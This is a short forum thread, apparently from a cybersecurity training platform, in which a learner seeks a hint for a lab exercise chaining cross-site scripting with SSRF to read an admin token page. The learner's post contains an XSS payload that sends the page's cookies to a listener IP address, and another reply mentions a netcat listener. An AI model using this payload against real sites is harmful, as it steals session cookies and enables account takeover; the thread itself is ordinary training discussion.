Forum Discussion

shubham's avatar
shubham
Icon for Bronze I rankBronze I
9 months ago
Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
help & support
  • CyberSharpe's avatar
    CyberSharpe
    9 months ago

    johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in. 

shubham's avatar
shubham
Icon for Bronze I rankBronze I
9 months ago

Thanks for welcome.

So I tire using netcat with the payload in message to make a reverse connection

Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>

NyePrior's avatar
NyePrior
Icon for Immerser rankImmerser
9 months ago

Hi shubham 👋 have another look at the "XSS and SSRF" section of the Briefing panel. You'll need to use a different payload than this.